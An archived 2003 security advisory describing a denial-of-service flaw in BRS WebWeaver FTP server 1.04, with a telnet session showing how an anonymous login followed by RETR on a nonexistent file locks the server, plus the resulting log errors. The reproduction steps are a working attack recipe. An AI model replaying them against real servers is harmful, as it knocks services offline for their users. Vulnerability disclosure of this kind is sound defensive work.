logo Home

Untitled Document

Home > Archives Advisories > Articles

Untitled Document

Untitled Document

BRS WebWeaver FTP RETR Command Denial of Service
Date: 2003-04-27

Author : euronymous <euronymous@iplus.ru>

topic: BRS WebWeaver: Ftpd Lockdown via RETR cmd
product: BRS WebWeaver 1.04 and prior
vendor: http://www.brswebweaver.com
risk: high
date: 04/23/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/021.en.txt
contact email: euronymous@iplus.ru

BRS WebWeaver have a dumb bug when trying to access
object, that not existent, with RETR command. Normal
behavior of ftp server will be print error message,
but webweaver just locks himself.

}-------- sample session -----------{

e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.
RETR blah
150 Opening data connection for blah.

}-------- sample session -----------{

Then i just close telnet session with webweaver and
try to connect server with ftp program.

}-------- sample session -----------{

e@some_box$ ftp hostname
Connection with hostname

}-------- sample session -----------{

That's all. Server is locked. No one can login in ftp
server. If i try to restart ftp server, then in my
log file will appear following:

}---------- from ftp.log -----------{

21/Apr/2003:17:30:27 - 195.**.***.** - User: anonymous - Disconnected
FTP Server Stopped
21/Apr/2003:17:30:38 - ERROR: FTP Server Fail to Start
21/Apr/2003:17:30:38 - Error 10022 in function WSAASyncSelect
Invalid argument

}---------- from ftp.log -----------{

Therefore, to restart ftp server u must close webweaver (with http
server) and run it again.

shouts: DWC, DHG, HUNGOSH, security.nnov.ru, Black Tigerz Research Group,
The N0b0D1eS, all russian security guyz!! to kate especially ))
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb
f*cking team

im not a lame,
not yet a hacker


arrowSearch Advisories


Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.


About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy